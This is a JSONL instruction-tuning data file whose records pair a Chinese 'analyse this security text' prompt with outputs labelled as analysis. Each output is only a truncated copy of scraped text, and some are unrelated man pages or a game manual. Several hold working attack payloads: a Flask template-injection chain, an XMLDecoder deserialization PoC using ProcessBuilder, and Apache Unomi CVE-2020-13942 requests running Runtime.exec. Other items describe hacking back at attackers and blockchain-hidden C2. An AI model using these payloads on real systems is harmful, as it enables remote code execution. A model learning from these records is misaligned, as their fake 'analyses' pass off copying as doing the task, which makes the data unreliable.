discuss how our code works, > go over ways to use the code, > cover the BTP Project, > and take ques'ons. What You Can Expect What is the World of Warcra4 API? > The UI for World of Warcra4 is wriYen in LUA. > LUA is a Object Oriented scrip'ng language. > Blizzard provides an API to write Addons. > Ingame informa'on is exposed through this API. > The API can be used to change the UI appearance. > The API also allows you to affect the environment with func'ons that can respond to a hardware buYon press. How the UI used to work before patch 2.0 > Make a func'on called NukePlayer(); > CastSpellByName(Fireball); > Make a macro: /nukeplayer > Bind /nukeplayer to a key. > Addons that used this: > decursive > onehitwonder > Behead the Prophet (BTP code) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Flaskcards Web Exploitation, 350 points ## Description: > We found this fishy **website** for flashcards that we think may be sending secrets. Could you take a look? ## Solution: The website was a simple \"Flashcard\" system, allowing the user to create question-answer pairs and then view them: Card creation: ![Flask](images/Flaskcards_1.png) Listing the cards: ![Flask](images/Flaskcards_2.png) Clicking the \"Admin\" link led to a page stating that \"You Are Not An Admin!\". The name of the challenge hints that it is related to Flask - a micro web framework written in Python. One of the known attacks related to Flask is called [template injection](https://nvisium.com/blog/2015/12/07/injecting-flask.html): We input python code encapsulated in double curly brackets and it gets executed by the template manager. We start with a small proof of concept: ``` {{''.__class__}} ``` The result is: ``` <class 'str'> ``` From there, we start building our way up: ``` Input: {{''.__class__.mro()}} Output: [<class 'str'>, <class 'object'>] -- Input: {{''.__class__.mro()[1].__subclasses__()}} Output: [<class 'itertools.compress'>, <class 'formatteriterator'>, [...], <class 'wtforms.validators.UUID'>, <class 'str_iterator'>, <class 'apscheduler.triggers.base.BaseTrigger'>, <class 'jinja2.runtime.LoopContextIterator'>, <class 'warnings.catch_warnings'>] -- Input: {{''.__class__.mro()[1].__subclasses__()[703]}} Output: <class 'warnings.catch_warnings'> -- Input: {{''.__class__.mro()[1].__subclasses__()[703]()._module.__builtins__}} Output: {'None': None, 'BufferError': <class 'BufferError'>, 'True': True, 'SyntaxWarning': <class 'SyntaxWarning'>, 'UnicodeEncodeError': <class 'UnicodeEncodeError'>, 'max': <built-in function max>, 'ConnectionAbortedError': <class 'ConnectionAbortedError'>, 'ImportError': <class 'ImportError'>, 'Warning': <class 'Warning'>, 'FutureWarning': <class 'FutureWarning'>, '__import__': <built-in function __import__>, 'hex': <built-in function hex>, 'NotImplemented':", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecure SDLC Practices in Smart Contracts Development Speaker: Pavlo Radchuk @rdchksec 2018 AppSec Engineer with Masters degree (several of experience) Smart Contract Audit Team Lead My team performs 7-10 audits per month About me Conducting different researches for new techniques, vulns etc. Analyzing competitors reports  they are quite different See all the problems from inside  What do my team do There are some best practices for Ethereum Solidity, but none for EOS, NEO, NEM, etc. Audit Problems No compliances (e.g. PCI DSS) No certifications (e.g. OSCP) No industry accepted standards and guidelines (e.g. OWASP testing guide) Audit says smart contracts is secure != Secure Smart Contract Despite all the drawbacks  an audit is still the best solution for smart contract security Audits alone are not enough  so what can be done? What can help with Smart Contracts Security SDLC is a term used in systems engineering, information systems and software engineering to describe a process for planning, creating, testing, and deploying an information system* * https://www.cms.gov/Research-Statistics-Data-and-Systems/CMS-Information-Technology/XLC/Downloads/SelectingDevelopmentApproach.pdf Secure SDLC Software Development Lifecycle What do web guys do for security? Security is achieved by processes Classic Web Development Cycle Typical Smart Contract Development Flow Smart contracts are immutable after deployment Web vs Smart Contracts Web Smart Contracts  Some Code Run on Servers  Code can be changed  Some Code Run on Nodes  If you use proxies  code can be changed (for instance, zos for Solidity) Development process contains  requirements, programming, testing, deployment, maintenance  Existing development guides, pentesting methodologies and compliances  Some unformalized best practices How to \"buidl\" a secure smart contract? Process SDLC Practices 1. Threat Assessment 2. Security Requirements 3. Developer Education 4. Private Key Management 5. QA Testing 6. Security Testing ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n感知诱捕情报协作 [ Kimon@灯塔实验室 ] 络空间控系统威胁情报 关于我们 | [ Kimon@灯塔实验室 ] 王启蒙 Kimon 电话18500851413 邮箱kimon@plcscan.org 微信ameng929 基础威胁情报 VS. 高级威胁情报 信息收集方式 VS. 威胁捕获技术 被动威胁感知架构体系 从威胁数据到威胁情报 [ 灯塔实验室@KCon ] Part. 01 基础威胁情报 VS. 级威胁情报 基础威胁情报 VS. 级威胁情报| [灯塔实验室@KCon ] 国外针对网络空间的情报收集计划 SHINE计划Project Shodan Intelligence Extraction X-PlaneTreasure MapNCR 绘制网络空间地图构建上帝视角感知能力 基础威胁情报 VS. 级威胁情报| [灯塔实验室@KCon ] 基础威胁情报数据情报 流量/文件 BGP/AS/路由/Whois/指纹 Passive DNS/信誉数据 战术威胁情报数据关联&分析 机读文件IoC/TTP 情报落地协作联动 战略威胁情报价值&决策 可读报告 意图分析感知预测决策支撑 基础威胁情报 VS. 级威胁情报| [灯塔实验室@KCon ] 数据情报 数据情报是威胁情报的基础 数据情报需要进一步融合关联分析 战略情报将关系上层决策不容有失 基础威胁情报 VS. 级威胁情报| [灯塔实验室@KCon ] 基础威胁情报 VS. 级威胁情报| [灯塔实验室@KCon ] 工控系统威胁情报 国家关键信息基础设施 针对能源关键制造等行业的威胁加剧 Stuxnet/Duqu/Flame BlackEnergy 针对SCADA系统的威胁加剧 远程可控制SCADAPLC 遍布互联网的工控资产 针对工控专有协议的探测 针对工控设施的威胁行为更值得研究 全球网络空间底线 具备上层战略特征 https://apt.securelist.com Part. 02 信息收集式VS. 威胁诱捕技术 开放的互联网设备搜索平台 Shodan shodan.io Censys censys.io ZoomEye zoomeye.org ICSfind icsfind.org IVRE ivre.rocks Rapid7 scan.io 开源扫描器框架 nmap nmap.org zmap zmap.io masscan github.com/robertdavidgraham/masscan 基于指纹识别平台的工控设备信息收集方式 ICS/SCADA/PLC Google/Shodanhq Cheat Sheet http://scadastrangelove.org/ Internet connected ICS/SCADA/PLC Cheat Sheet http://www.scadaexposure.com/ 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 利用标准且公开/私有的工控协议对工控系统及设备进行识别 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 利用传统服务特征对工控系统及设备进行识别 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 识别工具列举 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] https://scadahacker.com/resources/msf-scada.html 信息情报收集不只是扫描 Kill Chain至关重要的第一步 踩点组装投送攻击植入控制收割 由点至面 一个暴漏的工控服务 一个正在运转工业生产网络 40亿IPv4空间针对工控设备进行定位 针对工控网络新型渗透模式 PLC Blaster 网络空间设备搜索平台 时间轴设备信息态势 提供互联网靶标 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 威胁捕获方式 传统安全防御设备 针对工控系统的蜜罐 思科PLC蜜罐 Digitalbond 趋势科技 Conpot 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 工控蜜罐存在的问题 易被甄别 针对工控协议的仿真交互低 配置繁琐容易留下疏漏 缺少针对工控业务的仿真 难管理 蜜罐部署繁琐 不具备分布式管理机制 难分析 数据日志机制陈旧 数据量增多难以分析 不具备结合威胁情报的能力 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 主动监测国外蜜罐部署情况 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 通过Shodan搜索国外蜜罐案例 Shodan API 信息收集式 VS. 威胁诱捕技术| [灯塔实验室@KCon ] 国外工", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"CREATE TYPE\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME CREATE TYPE \\- 定义一个新的数据类型 .SH SYNOPSIS .sp .nf CREATE TYPE \\fIname\\fR AS ( \\fIattribute_name\\fR \\fIdata_type\\fR [, ... ] ) CREATE TYPE \\fIname\\fR ( INPUT = \\fIinput_function\\fR, OUTPUT = \\fIoutput_function\\fR [ , RECEIVE = \\fIreceive_function\\fR ] [ , SEND = \\fIsend_function\\fR ] [ , INTERNALLENGTH = { \\fIinternallength\\fR | VARIABLE } ] [ , PASSEDBYVALUE ] [ , ALIGNMENT = \\fIalignment\\fR ] [ , STORAGE = \\fIstorage\\fR ] [ , DEFAULT = \\fIdefault\\fR ] [ , ELEMENT = \\fIelement\\fR ] [ , DELIMITER = \\fIdelimiter\\fR ] ) .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBCREATE TYPE\\fR 为当前数据库注册一个新的数据类型 定义该类型的用户成为其所有者 .PP 如果给出模式名那么该类型是在指定模式中创建 否则它是在当前模式中创建类型名必需和同一模式中任何现有的类型或者域不同 因为表和数据类型有联系类型名不能和同模式中的表名字冲突 .SS \"COMPOSITE TYPES 复合类型\" .PP 第一种形式的 CREATE TYPE 创建一个复合类型 复合类型是通过一列属性名和数据类型声明的这样实际上和一个表的行类型一样 但是如果我们只是想定义一个类型那么使用 CREATE TYPE 避免了直接创建实际的表 一个独立的复合类型对于一个函数的返回类型非常有用 .SS \"BASE TYPES 基本类型\" .PP 第二种形式的CREATE TYPE创建一种新的基本类型标量类型 参数可以以任意的顺序出现而不是上面显示的那样并且大多数都是可选的 它要求要在定义类型之前先注册两个函数用CREATE FUNCTION命令 支持函数 input_function 和 output_function 是必须的 而函数 receive_function 和 send_function 是可选的 通常这些函数必须用 C 或者其它低层语言编写 .PP 函数 input_function 将该类型的外部文本形式转换成可以被对该类型操作的操作符和函数识别的内部形式 output_function 用做相反用途 输入函数可以声明为接受一个类型为 c_string 的参数或者接受三个类型分别为 c_stringoidinteger 的参数 第一个参数是 C 字串形式的输入文本第二个是在该类型为数组类型时其元素的类型 第三个是目标字段的typmod如果已知的话 它应该返回一个该数据类型本身的数值 输出函数可以声明为接受一个类型为新数据类型的参数 或者接受两个类型第二个参数的类型是 oid 第二个参数也是用于数组类型的数组元素类型输出函数应该返回类型 cstring .PP 可选的 receive_function 把该类型的外部二进制表现形式转换成内部表现形式 如果没有提供这个函数那么该类型不能用二进制输入二进制格式应该选取那种转换成内部格式比较容易的同时还有一定移植性的 比如标准的整数数据类型使用网络字节序作为外部的二进制表现形式而内部表现形式是机器的本机字节序 接收函数应该声明为接受一个类型为 internal 的参数或者两个类型分别为 internal 和 oid 的参数 它必须返回一个数据类型自身的数值第一个参数是一个指向一个 StringInfo 缓冲区的保存接受字节串的指针 可选的第二个参数是元素类型如果类型是一个数组类型的话类似的可选的 send_function 把类型转换为外部二进制表现形式 如果没有提供这些函数那么类型就不能用二进制方式输出发送函数可以声明为接收一个新数据类型 或者接收两个参数第二个参数的类型是 oid第二个参数仍然是用做数组类型的 发送函数必须返回 bytea .PP 这个时候你应该觉得奇怪就是输入和输出函数怎么可", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmapfile === 从标准输入读取行并赋值到数组 ## 概要 ```shell mapfile [-d delim] [-n count] [-O origin] [-s count] [-t] [-u fd] [-C callback] [-c quantum] [array] ``` ## 主要用途 - 从标准输入或文件描述符读取行并赋值到数组 ## 选项 ```shell -d delim 将delim设为行分隔符代替默认的换行符 -n count 从标准输入中获取最多count行如果count为零那么获取全部 -O origin 从数组下标为origin的位置开始赋值默认的下标为0 -s count 跳过对前count行的读取 -t 读取时移除行分隔符delim默认为换行符 -u fd 从文件描述符fd中读取 -C callback 每当读取了quantum行时调用callback语句 -c quantum 设定读取的行数为quantum 如果使用-C时没有同时使用-c指定quantum的值那么quantum默认为5000 当callback语句执行时将数组下一个要赋值的下标以及读取的行作为额外的参数传递给callback语句 如果使用-O时没有提供起始位置那么mapfile会在实际赋值之前清空该数组 ``` ## 参数 array可选用于输出的数组名称如果没有指定数组名称那么会默认写入到变量名为MAPFILE的数组中 ## 返回值 返回成功除非使用了非法选项指定的数组是只读的指定的数组不是下标数组 ## 例子 ```shell # 常见的读取形式 mapfile < source_file target_array cat source_file |mapfile target_array mapfile -u fd target_array # 只读取前5行 mapfile < source_file -n 5 target_array # 跳过前5行 mapfile < source_file -s 5 target_array # 在数组指定的下标开始赋值 # 请注意这样做不会清空该数组 mapfile < source_file -O 2 target_array # 读取时设定行分隔符为tab # 注意第二行的tab在终端需要用ctrl+v tab输入 mapfile < source_file -d $'\\t' target_array mapfile < source_file -d ' ' target_array # 读取时移除行分隔符tab mapfile < source_file -d $'\\t' -t target_array # 读取时移除行分隔符换行符 mapfile < source_file -t target_array # 每读取2行执行一次语句在这里是echo mapfile < source_file -C \"echo CALLBACK:\" -c 2 target_array # 遍历下标依次显示数组的元素 for i in ${!target_array[@]}; do printf \"%s\" ${target_array[i]} done ``` ### 注意 1. 该命令是bash内建命令相关的帮助信息请查看`help`命令 2. bash内建命令readarray是mapfile的同义词", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n早上起来刷了下朋友圈看到了一个新漏洞 蓝凌 OA 存在任意文件写入蓝凌并且还有漏洞地址 漏洞在/sys/search/sys_search_main/sysSearchMain.do 下面 这里也给出了 method 为 editrParam参数为 FdParameters 已经很明确了那么复现一下 在 com.landray.kmss.sys.search.jar 中的 com.landray.kmss.sys.search.actions.SysSearchMainAction 类 method 为 editrParam 看下流程 大概就是对 fdParemNames 的内容进行了判空如果不为空进入 SysSearchDictUtil.getParamConditionEntry 方法其实这一步不重要因为后面这 一步也没啥用就讲讲 主要还是在 setParametersToSearchConditionInfo 方法 也是对 fdParemNames 进行了一次判空然后传入 ObjectXML.objectXMLDecoderByString 方法这里就是漏洞点了 追过去就更好理解了讲传入进来的 string 字符进行替换然后讲其载入字节数组缓冲区 在传递给 objectXmlDecoder  在 objectXmlDecoder 中就更明显了典型的 xmlDecoder 反序列化 整体流程只对 FdParameters 的内容进行了一些内容替换 导致 xmlDecoder 反序列化漏洞 本地 POC: Xmldecoder payload 生成 https://github.com/mhaskar/XMLDecoder-payload-generator 这里尝试打开文稿 pages.app(第一次用 mac气质没跟上) Code: <?xml version=\"1.0\" encoding=\"UTF-8\"?> <java version=\"1.7.0_21\" class=\"java.beans.XMLDecoder\"> <void class=\"java.lang.ProcessBuilder\"> <array class=\"java.lang.String\" length=\"2\"><void index=\"0\"><string>open</string></void><void index=\"1\"><string>/Applications/Pages.app</string></void> </array> <void method=\"start\" id=\"process\"> </void> </void> </java> 当然别多想这是个后台洞因为开放的白名单只有以下几个 /login.jsp*; /resource/**; /service/**; /*/*.index; /logout*; /admin.do*; /browser.jsp*; /axis/*; /kk*; /forward.html*; /sys/webservice/*; /vcode.jsp;", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n红蓝对抗中的溯源反制实战 The practise of trace and retaliation in red team/blue team exercises 深圳证券交易所 网络安全主管 郭威 目录 战前准备 1 战中对抗 2 战后反思 3 总结 4 战前准备 组织工作 技术工作 4 引子 > 案例1社工 找到技术支持 QQ群 伪造成基金公 司人员 通过之后修改 姓名+头像 2天 关于XX网络安 全整改事项说明 T 出群聊 重新添加好友 分析链接 确定身份 IP定位 提交报告 5 引子 > 案例2钓鱼邮件 钓鱼邮件 控制邮箱 东莞深圳通技术有限公司 标题 发送 董事长A<xxxx@163.com> 接收 员工B 收到邮件马上建立一个公司QQ群方便工作安排建好群号发到此 邮箱给我 备注设置允许任何人加入先别拉人由我进群自行拉人 找到真实 IP 提交报告 6 问题 1. 高分报告长什么样 2. 溯源反制该如何组织 3. 蜜罐应该如何部署? 从现在的经验来看 n 这些攻击案例真的只值200+分吗 7 备战 > 组织架构 消息组4 分析组 9 处置组 4 线索 特征 处置 报告 各 部 门 异 地 中 心 下 属 公 司 关 联 机 构 监控组 11 可用性监控 指挥部 决 策 汇 报 工作小组 公安部 证监会 市网监 其他... 报 告 溯源反制组(3) 线索 8 备战 > 对蜜罐的理解 定位互联网用重型蜜罐内网 全量部署轻型蜜罐 n 获取攻击者信息IP社交ID n 反制攻击者 n 诱饵域名目录端口github文库等 n 手段jsonpmysql local infilerdp 漏洞执行文件activexpe文件 9 备战 > 蜜罐部署 已知漏洞 众测红蓝对抗 Shiro/Fastjson 热门漏洞 某VPN某EDR F5 WEB常见WEB漏洞 产品特性 RDP反制 Mysql 反制 路径跳转 a.b.cn/shiro 伪造接口 a.b.cn/actuator/env 域名复用 old.b.cn 欺骗域名 vpn.b.cn 常见目录 a.b.cn/admin 端口暴露 oa.b.cn:3389/21/22 github泄露 db.b.cn:3306 战中对抗 蜜罐 反制 11 迎战 > 拟定溯源反制组工作流程 n 高价值告警一部分来自于蜜罐一部分来自于分析组识别的真人攻击 n 低价值告警来自于NTAWAF等边界检测设备 人员能力栈构成 1能获取社工库信息电报群组 2具备攻击能力初级能熟练利用常见漏洞中级能代码审计组合利用漏洞高级有0day 3二级制逆向在沙箱基础上对PEELF文件具备分析能力 12 迎战 > 案例3发现黑产 5天过去了蜜罐依然没有收获只能主动出击 n IP注册地为香港特别行政区 n 存在 phpmyadmin 弱口令 n 数据库写文件拿到 webshell n 获取系统权限 13 迎战 > 案例3发现黑产 14 迎战 > 案例3发现黑产 1. 扫描器发现 800+ 台服务器存在 mysql 弱口令 2. C2服务器还控制了 600+ 台个人电脑 15 迎战 > 案例3发现黑产 ref.attacker.com 在一份19年的在线病毒分析报告中发现了 ref.attacker.com 曾经解析到了 119.xxx.xxx.xxx 1. 两个IP原先有正常业务victim.cn和 victim2.cn 2. 最晚在2020年3月黑客入侵了119.xxx.xxx.xxx victim2.cn将域名3456指向了该服务器直到 2020-06-18日 3. 预计在2020年9月黑客入侵了211.xxx.xxx.xxxvictim.cn 将域名3456指向了该服务器目前仍然有效 4. 域名qq177xxxxx.attakcer.org泄露了QQ号码 177xxxxxx 5. 利用QQ号码溯源到了身份证手机号信息 16 迎战 > 案例4谜之得分 IP 邮箱 whois 当当网账号 支付宝账号 红蓝对抗无关对于红蓝对抗无关的追踪溯源完整还原攻击链条溯源到黑客的虚拟身份真 实身份溯源到攻击队员反控攻击方主机根据程度阶梯给分本次溯源到疑似攻击者的虚 拟身份给XXX分 发现的攻击IP是非有效IP入侵是得分的前提对扫描探测进行信息探测踩点并未攻击成 功的追踪溯源不得分请明确是否入侵成功并提供入侵成功证据 17 迎战 > 案例5利用设备指纹捕获真实攻击者 aab21d24ebb6ca60f1405d5dc84a2453 bingzi5xxxx0 百度ID 百度贴吧 CSDN 脉脉 手机号 教育经历 工作经历 18 迎战 > 案例5利用设备指纹捕获真实攻击者2  蜜罐厂家指纹库 深交所 提交指纹 参演单位1 设备指纹 + 百度ID 参演", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HID-USBHarpoon > 文章作者 [Sarah-Briggs](https://github.com/Sarah-Briggs) & [Atomic-Crash](https://github.com/Atomic-Crash) & [r0fus0d](https://github.com/No-Github) <p align=\"center\"> <img src=\"../../../../../assets/img/banner/HID-USBHarpoon.jpg\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 简介 虽然说U盘体积已经缩小到很小但是作为一个移动存储设备还是很容易被识别一眼就能认出usb 数据线在生活中是很常见的我们可以用这个 usb 数据线作为载体与u盘相结合做一款既便携又能很好隐藏的可移动存储设备这样当别人看到这跟数据线只会以为是普通的数据线并不会联想到是一个移动存储设备同时这根数据线要能够往里存储数据也能够进行充电这样伪装如同间谍 **U 盘** U盘是 USB(universal serial bus)盘的简称据谐音也称优盘U盘是闪存的一种故有时也称作闪盘 闪盘快闪存储器英语flash memory是一种电子式可清除程序化只读存储器的形式允许在操作中被多次擦或写的存储器这种科技主要用于一般性数据存储以及在计算机与其他数字产品间交换传输数据如储存卡与U盘 闪存是一种非易失性存储器即断电数据也不会丢失因为闪存不像 RAM随机存取存储器一样以字节为单位改写数据因此不能取代RAM `U盘与硬盘的最大不同是它不需物理驱动器即插即用且其存储容量远超过软盘极便于携带.` U盘集磁盘存储技术闪存技术及通用串行总线技术于一体USB的端口连接电脑是数据输入/输出的通道主控芯片使计算机将U盘识别为可移动磁盘是U盘的大脑U盘Flash闪存芯片保存数据与计算机的内存不同即使在断电后数据也不会丢失PCB底板将各部件连接在一起并提供数据处理的平台 --- ## 常见存储卡类型 **SD 卡** Secure Digital卡简称SD卡从字面理解此卡就是安全卡它比CF卡以及早期的SM卡在安全性能方面更加出色是由日本的松下公司东芝公司和SanDisk公司共同开发的一种全新的存储卡产品最大的特点就是通过加密功能保证数据资料的安全保密 **T-Flash 卡 TF 卡** 全名TransFLash由摩托罗拉与SANDISK共同研发在2004年推出是一种超小型卡11*15*1MM约为SD卡的1/4可以算目前最小的储存卡了TF卡可经SD卡转换器后当SD卡使用利用适配器可以在使用SD作为存储介质的设备上使用TransFlash主要是为照相手机拍摄大幅图像以及能够下载较大的视频片段而开发研制的TransFlash卡可以用来储存个人数据例如数字照片MP3游戏及用于手机的应用和个人数据等还内设置版权保护管理系统让下载的音乐影像及游戏受保护 --- ## 制作过程 ### 数据线模块 这里我们采用的是 type-c 数据线micro-usb 口的数据线制作原理相同这里不做赘述在数据线伪装成U盘的同时可以对手机进行充电 1. 图中是一根普通的 type-c 数据线 2. 我们将 usb 的公头剪下来`注意不要带电操作`参考通用的数据线接线图以及 usb 公头接线图`注意线的正负极不要混淆公头的方向不要弄错两个开口向上时从左往右依次是GNDD+D-vcc`我们将红黑两根线剥开用于后面的焊接白绿两根线是用来给手机传输数据的这里剪去不用因为用了这两根线暂时就没办法使U盘正常与电脑通信也可以后期进行改造使用这两根线但是在这里暂且不用 3. 同时我们取下 usb 公头的金属外壳这也是整个环节里最难的部分因为里面的塑料部分非常的结实`注意在用刀时小心点不要割到手` 具体拆解不赘述了纯手工和技术活以下就是我们需要用到的配件`注意USB金属壳不要有明显的划痕脏污形变这一切都是为了更好的隐藏于环境之中!` --- ### U盘模块 1. 这次我们选用的是hp的64G迷你U盘体积非常小性能比较稳定可靠内存也是比较大的了U盘内存大于128G的多半是扩容盘实际容量可能只有8G或者是32G依据商家的良心这种扩容U盘当存储的数据大于它实际容量时可能会崩盘而且会非常烫对于存储数据来说很不安全毕竟没有人愿意用这种U盘而且在关键时刻翻车就很麻烦了 2. 我们对这个迷你U盘进行拆解外壳拆解时要小心谨慎不要弄坏了存储芯片 下图可以看到拆解以后有三个模块U盘存储芯片金属USB外壳塑料固定键这里我们只要U盘存储芯片因为金属USB外壳上有激光打印的字体而且看到以后很容易辨", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow the hell do you play this game? Page 2 of 42 An Introduction........................................................................................................... 4 A Thank you ................................................................................................................ 4 Getting Started............................................................................................................ 5 What does the universe look like?......................................................................................................................5 Creating some Ships..................................................................................................................................................5 Moving around ............................................................................................................................................................6 Actions ...........................................................................................................................................................................8 What the hell is going on ........................................................................................................................................9 Buying Upgrades ........................................................................................................................................................9 The Tic (or flow of game) ....................................................................................................................................10 Fleets.............................................................................................................................................................................11 Fleet Programming Tips.......................................................................................................................................11 Random Details.................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前言 想起前段时间我是非常抵触看官方文档的官方文档是什么东西我就算自己看源码学我也不会看 你文档一点现在发现文档是真的香啊 那之前我想自定动作的时候, 我头是真的铁. 我居然自己看: https://b23.tv/NQuKiI, 实际上人家官方就有 详细的文档 新版写的写法 我大致翻了一下文档, 权限认证呢我记得阅读 delete_selected() 源码的时候是有权限认证的呀. 难道新版不需要了仔细翻了一下原来注解可以限制权限了 我去翻了一下源码新版本(3.2.3)的默认动作加上了注解设置了所需权限和描述. 权限认证漏洞 我开始担心起来. 是否有人没有注意到需要设置权限或进行权限认证呢 更坏的情况是他写了文章而 且已经有人参考并跑在线上了 我百度随便翻了几篇, 都没有写权限验证的内容其中一篇文章有18万的阅读量, 还包括某乎的文章. 漏洞验证 运气好的是Django 的设计是以 POST 的方式请求当前页面进行处理 参考: https://b23.tv/6ZRcEb 也可以自己去翻源码: \\site- packages\\django\\contrib\\admin\\options.py: def response_action() 这样的设计设下了一次验证我们需要是 职员/管理员 身份才能进入后台所以我新建了一个用户并给 了职员的身份是用户是否可以登录到此管理站点 但是没有任何的权限所以登录后台也看不到任何东西不得不感叹一句 Django 验证真好 现在加上最基本的 view 权限让他可以查看内容仅仅只是查看 action 暴露出来了且能用 危害 原本的设计是我只有查看的权限但因为 action 的开发不规范用户可以做到了本做不到的越权产 生了, 但条件苛刻, 那如果职员账号是弱密码呢 如果你的站点也有这样的职员账号请检查 action 是否规范开发", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Unomi Remote Express Language Code Execution (CVE-2020-13942) [中文版本(Chinese version)](README.zh-cn.md) Apache Unomi is a Java Open Source customer data platform, a Java server designed to manage customers, leads and visitors data and help personalize customers experiences. In the versions prior to 1.5.1, Apache Unomi allowed remote attackers to send malicious requests with MVEL and OGNL expressions that could contain arbitrary classes, resulting in Remote Code Execution (RCE) with the privileges of the Unomi application. ## Environment Setup Execute following commands to start an Apache Unomi server 1.5.1: ``` docker compose up -d ``` After the environment is started, you can access Unomi's API through `http://your-ip:8181` or `https://your-ip:9443`. ## Vulnerability Reproduce The vulnerability can be triggered through both ports 8181 and 9443. Execute arbitrary commands through MVEL expressions: ``` POST /context.json HTTP/1.1 Host: localhost:8181 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 483 { \"filters\": [ { \"id\": \"sample\", \"filters\": [ { \"condition\": { \"parameterValues\": { \"\": \"script::Runtime r = Runtime.getRuntime(); r.exec(\\\"touch /tmp/mvel\\\");\" }, \"type\": \"profilePropertyCondition\" } } ] } ], \"sessionId\": \"sample\" } ``` Execute arbitrary commands through OGNL expressions: ``` POST /context.json HTTP/1.1 Host: localhost:8181 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 1064 { \"personalizations\":[ { \"id\":\"gender-test\", \"strategy\":\"matching-first\", \"strategyOptions\":{ \"fallback\":\"var2\" }, \"contents\":[ { \"filters\":[ { \"condition\":{ \"para", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nvgconvert === 转换卷组元数据格式 ## 补充说明 **vgconvert命令** 用于转换指定LVM卷组的元数据格式通常将LVM1格式的卷组转换为LVM2格式转换卷组元数据前必须保证卷组处于非活动状态否则无法完成转换操作 ### 语法 ```shell vgconvert(选项)(参数) ``` ### 选项 ```shell -M要转换的卷组格式 ``` ### 参数 卷组指定要转换格式的卷组 ### 实例 转换卷组元数据格式前使用vgchange命令将卷组设置为非活动状态在命令行中输入下面的命令 ```shell [root@localhost lvm]# vgchange -an vg1000 #设置卷组状态为非活动状态 0 logical volume(s) in volume group \"vg1000\" now active ```shell 使用vgconvert命令将卷组\"vg1000\"从\"LVM1\"格式转换为\"LVM2\"格式在命令行中输入下面的命令 ```shell [root@localhost lvm]# vgconvert -M2 vg1000 #转换卷组为\"LVM2\"格式 Volume group vg1000 successfully converted ``` 使用vgchange命令将卷组设置为活动状态在命令行中输入下面的命令 ```shell [root@localhost lvm]# vgchange -ay vg1000 #设置卷组状态为活动状态 0 logical volume(s) in volume group \"vg1000\" now active ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n利用区块链技术隐藏C&C服务器IP 这个月刚结束的Blackhat亚洲会议上有很多有意思的议题其中有一个议题How Did the Adversaries Abusing Bitcoin Blockchain Evade Our Takeover引起了我的兴趣主要是介绍了攻 击者利用比特币区块链的技术隐藏C&C服务器IP逃避接管的技术简单学习记录一下 介绍 网络安全一直是猫捉老鼠的游戏过去我们看到恶意软件生态系统采用了诸如代码混淆多态性域 生成算法DGA以及虚拟机和沙箱规避等概念只要防御能够对这些威胁进行一致且普遍的抑制 一些攻击者最近开始使用比特币区块链来传达命令和控制CC信息由于一旦矿工确认交易任何 人都无法阻止或从区块链中删除交易这意味着对手不必担心其CC位置的交易会被撤消恶意软件策 略技术和程序TTP的最新创新意味着现有的常见防御措施例如DGA预计算或漏洞域将不再 起作用 来自blackhat官方议题介绍 常用的缓解或检测C&C server的方式 预测恶意域名并停止它 检测查找模式尤其是NXDomain 在搜索其CC服务器时受感染的计算机会对当前不存在的域名执行大量查询这些所造成的 NXDomain响应泛滥在网络环境中很明显因为用户可能偶尔会错误键入域名但不会以固定间隔 连续输入数百次许多解决方案利用定期或批量查找结合大量NXDomain来对受感染的计算机进行 本地化 找到并抓住物理基础架构我的理解是定位到具体的服务器厂商服务器架设的地址等 采用区块链技术隐藏C&C server的优势 没有什么可预测的因为是利用的区块链上的交易也不可从链上删除 没有对异常站点的DNS查找从来没有任何NXDomain 